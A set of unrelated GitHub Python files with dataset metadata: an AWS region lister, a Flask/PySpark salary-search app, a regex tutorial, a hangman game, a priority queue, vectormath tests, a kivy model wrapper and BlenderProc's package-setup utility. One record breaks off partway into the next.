cloudprovider.CloudProvider ):\n\n    def __init__( self, regionGeoInfo, dateFormatFunction ):\n        super().__init__( regionGeoInfo, dateFormatFunction )\n\n\n    def getDataSources(self):\n        if self._mostRecentUpdate is None:\n            self.getRegions()\n\n        return [\n            {\n                'description': 'AWS Systems Manager Parameter Store',\n                'updated_timestamp': self._dateFormatFunction( self._mostRecentUpdate )\n            },\n        ]\n\n\n    def getRegions(self):\n        if self._regions is not None:\n            return self._regions\n        \n        try:\n            awsSsmClient = boto3.client( 'ssm', region_name=self._getEc2Region() )\n        except Exception as e:\n            logging.critical( \"Exception thrown when trying to establish SSM client connection, error: {0}\".format(e) )\n            sys.exit(1)\n\n        try:\n            regionQueryPath = \"/aws/service/global-infrastructure/regions\"\n\n            moreResults = True\n            queryToken = None\n            regionList = []\n\n            while moreResults is True:\n                if queryToken is None:\n                    #logging.debug(\"Getting params with no token\")\n                    ssmResults = awsSsmClient.get_parameters_by_path( Path=regionQueryPath )\n                else:\n                    #logging.debug( \"Getting params with token {0}\".format(queryToken) )\n                    ssmResults = awsSsmClient.get_parameters_by_path( Path=regionQueryPath, NextToken=queryToken )\n\n                resultParams = ssmResults['Parameters']\n\n                for currParam in resultParams:\n                    regionList.append( currParam['Value'] )\n                    #print( \"Param data for {0}:\\n{1}\".format(currParam['Value'], pprint.pformat(currParam, indent=4)))\n                    if self._mostRecentUpdate is None:\n                        self._mostRecentUpdate = currParam['LastModifiedDate']\n                    else:\n                        if currParam['LastModifiedDate'] > self._mostRecentUpdate:\n                            self._mostRecentUpdate = currParam['LastModifiedDate']\n\n                if 'NextToken' in ssmResults and len(ssmResults['NextToken']) > 0:\n                    moreResults = True\n                    queryToken = ssmResults['NextToken']\n                else:\n                    moreResults = False\n                    queryToken = None\n\n        except botocore.exceptions.ClientError as e:\n            logging.error(\"Error when requesting regions list: {0}\".format(e) )\n            sys.exit(1)\n\n        \n        regionList.sort()\n\n        self._regions = {}\n\n        for currRegionName in regionList:\n            #logging.info(\"working {0}\".format(currRegionName))\n            #print(\"region Geo info:\\n{0}\".format(self._regionGeoInfo))\n            self._regions[ currRegionName ] = self._regionGeoInfo[currRegionName]\n\n\n        logging.info( \"Leaving getRegions\" )\n\n        return self._regions\n\n\n    def _getEc2Region(self):\n        requestResult = requests.get( 'http://169.254.169.254/latest/dynamic/instance-identity/document' )\n        #logger.debug( \"Back from requests.get\" )\n        jsonDocument = requestResult.json()\n        awsRegion = jsonDocument['region']\n        logging.info( \"Script running in AWS region {0}\".format(awsRegion) )\n\n        return awsRegion\n","repo_name":"globalwatchpost/CloudRegionsList","sub_path":"site_generation/cloudprovider_aws.py","file_name":"cloudprovider_aws.py","file_ext":"py","file_size_in_byte":3610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"1018200641","text":"from flask import *\nimport requests\nimport pandas as pd\nfrom pyspark.context import SparkContext\nfrom pyspark.sql.session import SparkSession\nfrom pyspark.sql import SQLContext\nimport re\n\n\nsc = SparkContext('local')\nsqlContext = SQLContext(sc)\nspark = SparkSession(sc)\n\nurl = 'https://ds-demo-c0812.firebaseio.com/data_engineer.json'\nresponse = requests.get(url)\ndict_eng = response.json()\neng_df = pd.read_json(json.dumps(dict_eng))\n\neng_spark_df = sqlContext.createDataFrame(eng_df)\n\neng_df = eng_spark_df.toPandas()\n\ndef salary_range(df, sal):\n    
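# Editor's note -- a worked example of the parsing below (hypothetical row): a\n    # 'Salary Estimate' like '$39K-$64K' becomes '$39000-$64000' after the K replacement,\n    # and re.split('\\\\$|-', '$39000-$64000') returns ['', '39000', '', '64000'],\n    # so indices 1 and 3 hold the lower and upper bounds.\n    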
############################################################\n    # Method: salary_range(df, sal)\n    # input: \n    #    df: a pandas df\n    #    sal: the target salary input by user\n    # return:\n    #    A new pandas df with extra needed columns\n    ##################### Pseudo Code ##########################\n    # read a df with df['Salary Estimate']==xxK-xxK\n    # replace K with 000, split by \"-\", to int, append to lists\n    # append to df['lower'] & df['upper']\n    # check upper and lower and boolean df['inRange']\n    # to spark and filter, toPandas and return\n    lower = []\n    upper = []\n    for i in range(len(df)):\n        tmp = df['Salary Estimate'][i]\n        tmp2 = tmp.replace('K', '000')\n        sal_range = re.split('\\\\$|-',tmp2) # s[1]&s[3] are numbers\n        lower.append(sal_range[1])\n        upper.append(sal_range[3])\n\n    df['lower'] = lower\n    df['upper'] = upper\n    inRange = []\n    #salcheck = [] # debug use\n    for j in range(len(df)):\n        if( (sal>=float(df['lower'][j])) & (sal<=float(df['upper'][j])) ):\n            inRange.append(True)\n            #salcheck.append(type(sal)) # debug use\n        else:\n            inRange.append(False)\n\n    df['inRange'] = inRange\n    #df['debug'] = salcheck # debug use\n    tmp_spark_df = sqlContext.createDataFrame(df)\n    tmp2_spark_df = tmp_spark_df.filter(tmp_spark_df['inRange']==True).select('Company Name','Salary Estimate','Location','Size','Sector')\n    new_df = tmp2_spark_df.toPandas()\n    return new_df\n\n\napp = Flask(__name__)\n\n@app.route('/', methods=['GET', 'POST'])\n\ndef basic():\n    if request.method == 'POST':\n        if request.form['submit'] == 'overview':\n            test = request.form['name']\n            try:\n                num = int(test)\n                eng_spark_head_df = eng_spark_df.select('Company Name','Salary Estimate','Location','Size','Sector').limit(num)\n                eng_head_df = eng_spark_head_df.toPandas()\n                eng_head_df['Company Name'] = eng_head_df['Company Name'].str.slice(0,-4,1)\n                eng_head_df['Salary Estimate'] = eng_head_df['Salary Estimate'].str.slice(0,-17,1)\n                eng_head_df = eng_head_df.replace('-1', 'Unknown')\n                return render_template('index.html', tables=[eng_head_df.to_html(classes='data')], titles=eng_head_df.columns.values)\n            except:\n                return render_template('index.html',tables=[\"Please enter a positive integer.\"], titles=None)\n        \n        elif request.form['submit'] == 'location':\n            name = request.form['name']\n            # Use spark to select all location == input\n            # remember to remove the limit \n            eng_spark_location_df = eng_spark_df.filter(eng_spark_df[\"Location\"]==name).select('Company Name','Salary Estimate','Location','Size','Sector')#.limit(30)\n            eng_location_df = eng_spark_location_df.toPandas()\n            # Perform necessary data cleaning for readability\n            eng_location_df['Company Name'] = eng_location_df['Company Name'].str.slice(0,-4,1)\n            eng_location_df['Salary Estimate'] = eng_location_df['Salary Estimate'].str.slice(0,-17,1)\n            eng_location_df = eng_location_df.replace('-1', 'Unknown')\n            eng_location_lst = eng_location_df.values.tolist()\n            #output=[['Company Name','Salary Range','Location','Company Size']]\n            #for item in eng_location_lst:\n            #    output.append(item)\n            if eng_location_lst==[]:\n                return render_template('index.html',tables=[\"No match or invalid input!\"], titles=None)\n\n            return render_template('index.html', tables=[eng_location_df.to_html(classes='data')], titles=eng_location_df.columns.values)\n        \n        elif request.form['submit'] == 'salary':\n            salary = request.form['name']\n            # check if input is a number, if not, return\n            try:\n                checkFormat = float(salary)\n            except:\n                return render_template('index.html',tables=['Invalid input! 
Please enter a number.'], titles=None)\n            # Use spark to select all rows; the salary filtering happens in salary_range below\n            eng_spark_salary_df = eng_spark_df.select('Company Name','Salary Estimate','Location','Size','Sector')\n            eng_salary_df = eng_spark_salary_df.toPandas()\n            # Perform necessary data cleaning for readability\n            eng_salary_df['Company Name'] = eng_salary_df['Company Name'].str.slice(0,-4,1)\n            eng_salary_df['Salary Estimate'] = eng_salary_df['Salary Estimate'].str.slice(0,-17,1)\n            eng_salary_df = eng_salary_df.replace('-1', 'Unknown')\n            # Find suitable salary range\n            eng_new_salary_df = salary_range(eng_salary_df, float(salary))\n            eng_salary_lst = eng_new_salary_df.values.tolist()\n            #output=[['Company Name','Salary Range','Location','Company Size']]\n            #for item in eng_salary_lst:\n            #    output.append(item)\n            if eng_salary_lst==[]:\n                return render_template('index.html',tables=[\"No match!\"], titles=None)\n            \n            return render_template('index.html',tables=[eng_new_salary_df.to_html(classes='data')], titles=eng_new_salary_df.columns.values)\n\n        elif request.form['submit'] == 'sector':\n            name = request.form['name']\n            # Use spark to select all sector == input\n            eng_spark_sector_df = eng_spark_df.filter(eng_spark_df[\"Sector\"]==name).select('Company Name','Salary Estimate','Location','Size','Sector')\n            eng_sector_df = eng_spark_sector_df.toPandas()\n            # Perform necessary data cleaning for readability\n            eng_sector_df['Company Name'] = eng_sector_df['Company Name'].str.slice(0,-4,1)\n            eng_sector_df['Salary Estimate'] = eng_sector_df['Salary Estimate'].str.slice(0,-17,1)\n            eng_sector_df = eng_sector_df.replace('-1', 'Unknown')\n            eng_sector_lst = eng_sector_df.values.tolist()\n            if eng_sector_lst==[]:\n                return render_template('index.html', tables=[\"No match or be more specific.\",\"For example: Finance, Information Technology, etc.\"], titles=None)\n\n            return render_template('index.html',tables=[eng_sector_df.to_html(classes='data')], titles=eng_sector_df.columns.values)\n\n    return render_template('index.html')\n\n\nif __name__ == '__main__':\n\tapp.run()\n","repo_name":"haonanxu21/DSCI551-Project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"}
{"seq_id":"13951903476","text":"import re\n\n# The following walks through three main re functions: re.match, re.search() and re.compile()\n# For more on the content below, see the blog post I wrote at the time\ncontent = 'Hello 123 4567 World_This is a Regex Demo'\nresult1 = re.match('Hello\\s\\d{3}\\s\\d{4}\\s\\w{10}', content)\nprint(result1)\n# group() is used in regular expressions to retrieve the captured substrings\nprint(result1.group())\nprint(result1.span())\n\n# Next is re.search, which improves on re.match: re.match can only match from the\n# very beginning of the string, while re.search scans the whole string from the\n# start and stops as soon as a match is found.\nline = \"Cats are smarter than dogs\"\nmatchObj1 = re.match(r'dogs', line, re.M | re.I)\nif matchObj1:\n    print(matchObj1.group())\nelse:\n    print(\"No match!!\")\nmatchObj2 = re.search(r'dogs', line, re.M | re.I)\nprint(matchObj2.group())\n\ns = 'A B C D'\nresult2 = re.compile('\\w+\\s+\\w?').findall(s)\nprint(result2)\n\nresult3 = re.compile('(\\w+\\s+)\\w?').findall(s)\nprint(result3)\n
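\n# Editor's note (expected output, a quick check): result2 holds the full matches\n# ['A B', 'C D'], while result3 returns only the captured group: ['A ', 'C '].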
\ntest_str = '''\n\n\n\n\n\n'''\n# To extract the name/value pairs above, a regular expression makes it very easy\nresult3 = re.compile(' 1:\n            return\n        if guessedLetter.guess in self.wordToGuess:\n            self.lastLetterGuessedCorrectly = True\n            charIdx = 0\n            numInstances = 0\n            gameWon = True\n            for charIdx in range(len(self.wordToGuess)):\n                if self.wordToGuess[charIdx] == guessedLetter.guess:\n                    self.currGuessedWord[charIdx] = guessedLetter.guess\n                    numInstances += 1\n                if self.currGuessedWord[charIdx] != self.wordToGuess[charIdx]:\n                    gameWon = False\n                charIdx += 1\n            self.gameWon = gameWon\n            self.gameOver = self.gameWon\n            guessedLetter.numOccurences = numInstances\n        else: # wrong guess!\n            self.incorrectGuessedLetters.append(guessedLetter.guess)\n            self.incrementNumIncorrectGuesses()\n            if self.numIncorrectGuesses >= 6:\n                self.gameOver = True\n                assert (self.gameWon is False)\n        self.incrementNumberOfGuesses()\n        return\n\n    def incrementNumIncorrectGuesses(self):\n        self.numIncorrectGuesses += 1\n\n    def incrementNumberOfGuesses(self):\n        self.numOfGuesses += 1\n\n    def __str__(self):\n        # print the hangman graphic\n        retVal = hangmanGraphics[self.numIncorrectGuesses]\n        # print the currently guessed word\n        retVal += \"\\n\" + self.printCurrGuessedWord()\n        retVal += \"\\n\" + self.printDashes()\n        retVal += \"\\n\" + \"Number of guesses remaining: {}\".format(str(6 - self.numIncorrectGuesses))\n        retVal += \"\\n\" + \"Letters already guessed: {}\".format(str(self.incorrectGuessedLetters))\n        return retVal\n\n\nclass Gallow:\n    head = 'o'\n    body = '||'\n    leftArm = '-'\n    rightArm = '-'\n    leftLeg = '/'\n    rightLeg = '\\\\'\n    maxNumMistakes = 6\n\n    def __init__(self):\n        self.numMistakes = 0\n\n    def __str__(self):\n        \"\"\"\n        @TODO implement: draw the gallows based on self.numMistakes\n        :return: the gallows drawing as a string (empty placeholder for now)\n        \"\"\"\n        # retVal = gallow\n        return \"\"\n\n\nclass Guess:\n    def __init__(self, guess):\n        self.guess = guess\n        self.correct = False\n\n\nclass WordGuess(Guess):\n    def __init__(self, guessedWord):\n        super().__init__(guessedWord)\n        self.sizeDifferenceFromWordToGuess = 0\n\n    def printIncorrectGuess(self):\n        print(\"{} is not the word I'm looking for!\".format(self.guess))\n\n\nclass LetterGuess(Guess):\n    def __init__(self, guessedLetter):\n        super().__init__(guessedLetter)\n        self.numOccurences = 0\n        self.wasAlreadyGuessed = True\n\n    def incrementNumOccurences(self):\n        self.numOccurences += 1\n\n    def printIncorrectGuess(self):\n        print(\"{} is not the word I'm looking for!\".format(self.guess))\n\n\ndef driver():\n    while True:\n        system('clear')\n        print(\"Welcome to hangman!\")\n        hangman = Hangman(processWordInput())\n        print(hangman)\n        currGuess = object()\n        while not hangman.gameOver:\n            letterOrWordGuessInput = processLetterInput(\"Enter a letter to guess or -wg to \"\n                                                        \"guess a complete word/phrase: \")\n            if letterOrWordGuessInput == \"--wordguess\" or letterOrWordGuessInput == \"-wg\":\n                wordGuess = processWordInput()\n                currGuess = WordGuess(wordGuess)\n            else:\n                currGuess = LetterGuess(letterOrWordGuessInput)\n            hangman.processGuess(currGuess)\n            # clear terminal\n            system('clear')\n            print(hangman)\n            print(\"\")\n        if hangman.gameWon:\n            print(\"You won!\")\n        else:\n            print(\"You lost :(\")\n        print(\"\\nThe word was *** {} ***\".format(hangman.wordToGuess.upper()))\n        wantToPlayAgain = processLetterInput((\"Would you like to play again? 
[y/n]: \"))\n if wantToPlayAgain.lower() == 'n':\n break\n\n\nif __name__ == '__main__':\n driver()\n","repo_name":"scomora/Hangman","sub_path":"Hangman/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":8031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7767292198","text":"from classes.node import Node\n\nclass PriorityQueue:\n\n def __init__(self, root=None):\n self.arr = []\n self.size = 0\n\n def add(self, value):\n\n self.arr.append(value)\n self.size += 1\n current_index = self.size - 1\n\n while current_index > 0:\n parent_index = (current_index - 1) // 2\n\n if self.arr[parent_index] < self.arr[current_index]:\n break\n\n self.arr[parent_index], self.arr[current_index] = self.arr[current_index], self.arr[parent_index]\n current_index = parent_index\n\n def poll(self):\n\n if self.size == 0:\n return\n\n self.arr[0], self.arr[self.size - 1] = self.arr[self.size - 1], self.arr[0]\n value = self.arr.pop()\n self.size -= 1\n\n if self.size > 0:\n self.heapify(0)\n\n print(value)\n\n def heapify(self, current_index):\n\n if not self.is_leaf(current_index):\n left_child = 2 * current_index + 1\n right_child = 2 * current_index + 2\n\n if right_child < self.size:\n if self.arr[right_child] < self.arr[current_index] or self.arr[left_child] < self.arr[current_index]:\n if self.arr[right_child] < self.arr[left_child]:\n self.arr[right_child], self.arr[current_index] = self.arr[current_index], self.arr[right_child]\n self.heapify(right_child)\n else:\n self.arr[left_child], self.arr[current_index] = self.arr[current_index], self.arr[left_child]\n self.heapify(left_child)\n else:\n if self.arr[left_child] < self.arr[current_index]:\n self.arr[left_child], self.arr[current_index] = self.arr[current_index], self.arr[left_child]\n self.heapify(left_child)\n\n def is_leaf(self, current_index):\n\n if current_index >= self.size // 2 and current_index <= self.size - 1:\n return True\n\n return False\n\n def contains(self, value):\n if self.size == 0:\n return\n else:\n if value in self.arr:\n return True\n\n return False\n\n def poll_rest(self):\n\n while self.size > 0:\n self.poll()\n\n def peek(self):\n return self.arr[0]\n\n def __str__(self):\n return f'Heap: {self.arr} & size {self.size}'\n\n\nif __name__ == '__main__':\n heapq = PriorityQueue()\n\n heapq.add(5)\n heapq.add(2)\n heapq.poll()\n print(heapq)\n heapq.add(1)\n heapq.poll()\n print(heapq)\n heapq.add(4)\n heapq.add(10)\n heapq.add(11)\n print(heapq)\n heapq.poll_rest()\n\n print('Second')\n heapq.add(5)\n heapq.add(12)\n heapq.add(8)\n heapq.poll()\n heapq.add(17)\n heapq.add(3)\n heapq.poll()\n heapq.add(7)\n heapq.add(23)\n heapq.poll()\n heapq.add(46)\n heapq.add(69)\n heapq.poll()\n heapq.poll()\n heapq.poll()\n heapq.add(1)\n heapq.poll_rest()\n","repo_name":"EashanKaushik/Data-Structures","sub_path":"08.1_priority_queue_implementation.py","file_name":"08.1_priority_queue_implementation.py","file_ext":"py","file_size_in_byte":3016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20800495612","text":"import unittest\n\nfrom hamcrest import assert_that, equal_to\nimport numpy as np\nimport vectormath as vmath\n\n\nclass Vector3DShould(unittest.TestCase):\n @staticmethod\n def test_canary():\n assert_that(2 + 2, equal_to(4))\n\n @staticmethod\n def test_vector3d_as_string_is_correct():\n sut = vmath.Vector3(423747, 8142822, -8602)\n\n assert_that(str(sut), equal_to('[ 423747. 8142822. 
-8602.]'))\n\n    @staticmethod\n    def test_vector3d_xyz_are_correct():\n        sut = vmath.Vector3(423747, 8142822, -8602)\n\n        assert_that(sut.x, equal_to(423747))\n        assert_that(sut.y, equal_to(8142822))\n        assert_that(sut.z, equal_to(-8602))\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"mrwizard82d1/learn_vectormath","sub_path":"tests/test_vector_3.py","file_name":"test_vector_3.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"74692004889","text":"\"\"\"\nAllow the simple creation of kivy UIs for arbitrary python objects. The UI\nwill automatically update as the underlying python model changes, provided any\nfunction on the UI side uses the \"update\" decorator.\n\"\"\"\n\nimport kivy\nkivy.require('1.7.0')\n\nfrom kivy.app import App\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.properties import StringProperty, ListProperty, ObjectProperty\nfrom kivy.event import EventDispatcher\nfrom kivy.lang import Builder\n\n\n##################\n# DATA MODEL SIDE\n##################\n\nclass DataModel(object):\n    def __init__(self):\n        self.a = 'This is a'\n        self.b = 'This is b'\n\n    @property\n    def c(self):\n        return self.a + '\\nand\\n' + self.b\n\n    @property\n    def list_d(self):\n        return [self.a, self.b]\n\n##################\n# BRIDGE\n##################\n\nclass UI_DataModelMeta(type):\n    def __new__(meta, name, bases, dct):\n        if '_model_class' not in dct.keys():\n            raise AttributeError(\"UI_DataModel must have _model_class attribute\")\n        example_model = dct['_model_class']()\n        # Create kivy StringProperty objects for all the attributes\n        # in the underlying data model\n        added_attributes = []\n        for attr in dir(example_model):\n            if not attr.startswith('_'):\n                ##print \"Making attribute %s\" % attr\n                assert attr not in dir(EventDispatcher())\n                if isinstance(getattr(example_model, attr), list):\n                    dct[attr] = ListProperty(['INIT',])\n                else:\n                    dct[attr] = StringProperty('INIT')\n                added_attributes.append(attr)\n        # Let the UI_DataModel know what attributes are from the common model\n        dct['_model_attr'] = added_attributes\n        return super(UI_DataModelMeta, meta).__new__(meta, name, bases, dct)\n\n\nclass UI_DataModel(EventDispatcher):\n    __metaclass__ = UI_DataModelMeta\n    _model_class = DataModel\n    def __init__(self, parent=None):\n        if parent is None:\n            parent = self._model_class()\n        if not isinstance(parent, self._model_class):\n            raise TypeError(\"Passed data model must be of same type as _model\")\n        self.__parent = parent\n#        print \"Making a datamodel with parent's attributes, which are:\"\n#        print '\\t' + str(self._model_attr)\n    def __getattribute__(self, key):\n#        print \">> Trying to get %s\" % key\n        if key in ('_model_attr', '__parent', '_model_class', '_model'):\n            return object.__getattribute__(self, key)\n        elif key in self._model_attr:\n#            print \"   INTERCEPTED!\"\n            # Get the value of this key from the common data model\n            val = getattr(self.__parent, key)\n#            print \"   val or %s is %s\" % (key, val)\n            # Typecast as needed\n            if isinstance(val, list):\n                # Construct a list of property objects\n                val2 = []\n                for a in val:\n                    # We have to create a whole new UI model for these...\n                    #class SubModel(UI_DataModel):\n                    #    _model_class = type(a)\n                    #val2.append(SubModel(a))\n                    val2.append(str(a))\n            else:\n                val2 = str(val)\n            # Invoke kivy's Property setter by setting our attribute\n            setattr(self, key, val2)\n            # Proceed as normal\n            return EventDispatcher.__getattribute__(self, key)\n        else:\n#            print \" 
Pushing up to base class\"\n            return EventDispatcher.__getattribute__(self, key)\n\n    @property\n    def _model(self):\n        return self.__parent\n\n    @_model.setter\n    def _model(self, new_parent):\n        if not isinstance(new_parent, self._model_class):\n            raise TypeError(\"Passed data model must be of same type as _model\")\n        self.__parent = new_parent\n        # Update ourselves\n        self.update(lambda: None)()\n\n    def update(self, func):\n        \"\"\"Decorator to put around any UI function that updates the common\n        data model\"\"\"\n        def wrapper(*args, **kwargs):\n            # Execute function as normal\n            ret = func(*args, **kwargs)\n            # Update UI Data Model wrapper\n            for attr in self._model_attr:\n                getattr(self, attr)\n            return ret\n        return wrapper\n\n\n##################\n# UI SIDE\n##################\n\nBuilder.load_string(\"\"\"\n<RootWidget>:\n    cols: 2\n    Label:\n        text: \"Attribute a:\"\n    Label:\n        text: root.ui_data_model.a\n    Label:\n        text: \"Attribute b:\"\n    Label:\n        text: root.ui_data_model.b\n    Label:\n        text: \"Attribute c:\"\n    Label:\n        text: root.ui_data_model.c\n    Label:\n        text: \"Attribute list d[0]:\"\n    Label:\n        text: root.ui_data_model.list_d[0]\n    Button:\n        text: \"Make data_model.a longer\"\n        on_press: root.button_press()\n    Button:\n        text: \"Make data_model.b shorter\"\n        on_press: root.button_press2()\n\"\"\")\n\n\nclass RootWidget(GridLayout):\n    ui_data_model = UI_DataModel(DataModel())\n\n    def __init__(self, **kwargs):\n        GridLayout.__init__(self, **kwargs)\n        # Set up our model\n        self.data_model = DataModel()\n        self.ui_data_model._model = self.data_model\n\n    @ui_data_model.update\n    def button_press(self, *args):\n        # Make sure you modify the common data model, not the UI's\n        # data model wrapper\n        self.data_model.a = 'This is a and it is really long now'\n        ##print common_data_model.c\n        ##print self.ui_data_model.c\n        ##print self.ui_data_model.a\n\n    @ui_data_model.update\n    def button_press2(self, *args):\n        self.data_model.b = 'B'\n        ##print common_data_model.c\n        ##print self.ui_data_model.c\n\nclass TestApp(App):\n    def build(self):\n        return RootWidget()\n\nif __name__ == '__main__':\n    app = TestApp()\n    app.run()","repo_name":"jsexauer/ItBuildsCharacter","sub_path":"kivy_app/data_model_wrapper.py","file_name":"data_model_wrapper.py","file_ext":"py","file_size_in_byte":5928,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"}
{"seq_id":"43330886600","text":"menu =\"\"\"\nWelcome to the Currency Converter\n\n1 -Colombian Pesos\n2 -Argentine Pesos\n3 -Mexican Pesos\n4 -Bolivars\n\n\nChoose an option: \"\"\"\n\ndef conversor(tipo_moneda, valor_dolar):\n    pesos = input(\"How many \" + tipo_moneda + \" pesos do you have?: \")\n    pesos = float(pesos)\n    dolares = pesos/valor_dolar\n    dolares = round(dolares, 2)\n    dolares = str(dolares)\n    print(\"You have $\" + dolares + \" Dollars\")\nopcion = int(input(menu))\n\nif opcion == 1:\n    conversor(\"Colombian\", 3875)\nelif opcion == 2:\n    conversor(\"Argentine\", 65)\nelif opcion == 3:\n    conversor(\"Mexican\", 24)\nelif opcion == 4:\n    bolivares = input(\"How many Bolivars do you have?: \")\n    bolivares = float(bolivares)\n    valor_dolar = 4.90\n    dolares = bolivares/valor_dolar\n    dolares = round(dolares, 2)\n    dolares = str(dolares)\n    print(\"You have $\" + dolares + \" Dollars\")\n\nelse:\n    print('Please enter a valid option 
')\n\n\n\n","repo_name":"DonielAcosta/python-3","sub_path":"convertidor.py","file_name":"convertidor.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"34748054156","text":"\"\"\" Ensures that all necessary pip packages are installed in the blender environment. \"\"\"\n\nimport os\nimport sys\nimport tarfile\nfrom sys import platform\nimport subprocess\nimport importlib\nfrom io import BytesIO\nimport zipfile\nimport uuid\nfrom typing import List, Optional, Union, Dict, Tuple\nimport json\n\nimport requests\n\nfrom blenderproc.python.utility.DefaultConfig import DefaultConfig\n\n\nclass SetupUtility:\n    \"\"\"\n    Setup class that ensures all necessary pip packages are present\n    \"\"\"\n    # Remember already installed packages, so we do not have to call pip freeze multiple times\n    installed_packages: Optional[Dict[str, str]] = None\n    package_list_is_from_cache = False\n    main_setup_called = False\n\n    @staticmethod\n    def setup(user_required_packages: Optional[List[str]] = None, blender_path: Optional[str] = None,\n              major_version: Optional[str] = None, reinstall_packages: bool = False,\n              debug_args: Optional[List[str]] = None) -> List[str]:\n        \"\"\" Sets up the python environment.\n\n        - Makes sure all required pip packages are installed\n        - Prepares the given sys.argv\n\n        :param user_required_packages: A list of python packages that are additionally necessary to execute the\n                                       python script.\n        :param blender_path: The path to the blender installation. If None, it is determined automatically based on\n                             the current python env.\n        :param major_version: The version number of the blender installation. If None, it is determined automatically\n                              based on the current python env.\n        :param reinstall_packages: Set to true, if all python packages should be reinstalled.\n        :param debug_args: Can be used to overwrite sys.argv in debug mode.\n        :return: List of sys.argv after removing blender specific commands\n        \"\"\"\n        packages_path = SetupUtility.setup_pip(user_required_packages, blender_path, major_version, reinstall_packages)\n\n        if not SetupUtility.main_setup_called:\n            SetupUtility.main_setup_called = True\n            sys.path.append(packages_path)\n            is_debug_mode = \"--background\" not in sys.argv\n\n            # Setup temporary directory\n            if is_debug_mode:\n                SetupUtility.setup_utility_paths(\"examples/debugging/temp\")\n            else:\n                SetupUtility.setup_utility_paths(sys.argv[sys.argv.index(\"--\") + 2])\n\n            # Only prepare args in non-debug mode (In debug mode the arguments are already ready to use)\n            if not is_debug_mode:\n                # Cut off blender specific arguments\n                sys.argv = sys.argv[sys.argv.index(\"--\") + 1:sys.argv.index(\"--\") + 2] + \\\n                           sys.argv[sys.argv.index(\"--\") + 3:]\n            elif debug_args is not None:\n                sys.argv = [\"debug\"] + debug_args\n\n        return sys.argv\n\n    
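# Editor's note -- a minimal usage sketch per the docstring above; the package\n    # name is a hypothetical example:\n    #   argv = SetupUtility.setup(user_required_packages=[\"h5py\"])\n\n    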
@staticmethod\n    def setup_utility_paths(temp_dir: str):\n        \"\"\" Set utility paths: Temp dir and working dir.\n\n        :param temp_dir: Path to temporary directory where Blender saves output. Default is shared memory.\n        \"\"\"\n        # pylint: disable=import-outside-toplevel,cyclic-import\n        from blenderproc.python.utility.Utility import Utility, resolve_path\n        # pylint: enable=import-outside-toplevel,cyclic-import\n\n        Utility.temp_dir = resolve_path(temp_dir)\n        os.makedirs(Utility.temp_dir, exist_ok=True)\n\n    @staticmethod\n    def determine_python_paths(blender_path: Optional[str], major_version: Optional[str]) -> Tuple[str, str, str, str]:\n        \"\"\" Determines python binary, custom pip packages and the blender pip packages path.\n\n        :param blender_path: The path to the blender main folder.\n        :param major_version: The major version string of the blender installation.\n        :return:\n            - The path to the python binary of the blender installation\n            - The path to the directory for custom pip packages installed by BlenderProc\n            - The path to the site-packages directory inside that custom package directory\n            - The path to the directory containing pip packages pre-installed by blender.\n        \"\"\"\n        # If no blender path is given, determine it based on sys.executable\n        if blender_path is None:\n            blender_path = os.path.abspath(os.path.join(os.path.dirname(sys.executable), \"..\", \"..\", \"..\"))\n            major_version = os.path.basename(os.path.abspath(os.path.join(os.path.dirname(sys.executable), \"..\", \"..\")))\n\n        # Based on the OS, determine the four paths\n        current_python_version = \"python3.10\"\n        if platform in [\"linux\", \"linux2\"]:\n            python_bin_folder = os.path.join(blender_path, major_version, \"python\", \"bin\")\n            python_bin = os.path.join(python_bin_folder, current_python_version)\n            packages_path = os.path.abspath(os.path.join(blender_path, \"custom-python-packages\"))\n            packages_import_path = os.path.join(packages_path, \"lib\", current_python_version, \"site-packages\")\n            pre_python_package_path = os.path.join(blender_path, major_version, \"python\", \"lib\",\n                                                   current_python_version, \"site-packages\")\n        elif platform == \"darwin\":\n            python_bin_folder = os.path.join(blender_path, \"..\", \"Resources\", major_version, \"python\", \"bin\")\n            python_bin = os.path.join(python_bin_folder, current_python_version)\n            packages_path = os.path.abspath(os.path.join(blender_path, \"custom-python-packages\"))\n            packages_import_path = os.path.join(packages_path, \"lib\", current_python_version, \"site-packages\")\n            pre_python_package_path = os.path.join(blender_path, \"..\", \"Resources\", major_version, \"python\",\n                                                   \"lib\", current_python_version, \"site-packages\")\n        elif platform == \"win32\":\n            python_bin_folder = os.path.join(blender_path, major_version, \"python\", \"bin\")\n            python_bin = os.path.join(python_bin_folder, \"python\")\n            packages_path = os.path.abspath(os.path.join(blender_path, \"custom-python-packages\"))\n            packages_import_path = os.path.join(packages_path, current_python_version.replace(\".\", \"\").capitalize(),\n                                                \"site-packages\")\n            pre_python_package_path = os.path.join(blender_path, major_version, \"python\", \"lib\", \"site-packages\")\n        else:\n            raise RuntimeError(f\"This system is not supported yet: {platform}\")\n\n        return python_bin, packages_path, packages_import_path, pre_python_package_path\n\n    
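# Editor's illustration (hypothetical Linux install at /opt/blender, major_version \"3.3\"):\n    #   python_bin              -> /opt/blender/3.3/python/bin/python3.10\n    #   packages_path           -> /opt/blender/custom-python-packages\n    #   packages_import_path    -> /opt/blender/custom-python-packages/lib/python3.10/site-packages\n    #   pre_python_package_path -> /opt/blender/3.3/python/lib/python3.10/site-packages\n\n    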
